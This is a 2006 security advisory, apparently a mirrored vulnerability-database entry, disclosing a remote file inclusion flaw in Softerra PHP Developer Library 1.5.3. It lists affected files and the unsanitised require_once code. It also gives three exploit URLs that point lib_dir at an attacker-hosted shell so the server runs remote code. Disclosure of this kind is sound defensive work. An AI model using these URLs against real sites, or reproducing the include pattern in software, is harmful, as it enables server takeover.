Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14652
HistoryOct 12, 2006 - 12:00 a.m.

Softerra. PHP Developer Library

2006-10-1200:00:00
vulners.com
25

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##

[ Softerra. PHP Developer Library ]

Class: Remote File Include Vulnerability

Patch: Unavailable

Published 2006/10/12

Remote: Yes

Local: No

Type: High

Site: http://www.softerra.com/products_php-library.htm

Author: MP

Contact: [email protected]

#################################################################

Exploit:

http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/registry.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlcompose.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlsearch.lib.php?lib_dir=http://attacker.com/shell?

Vuln Files:

registry.lib.php
sqlcompose.lib.php
sqlsearch.lib.php

Vuln Code:

…/lib/registry.lib.php

<? …
require_once ($lib_dir . "sqlstorage.class.php");
… ?>

…/lib/sqlcompose.lib.php

<? …
require_once ($lib_dir . "array.lib.php");
… ?>

…/lib/sqlsearch.lib.php

<? …
require_once ($lib_dir . "array.lib.php");
… ?>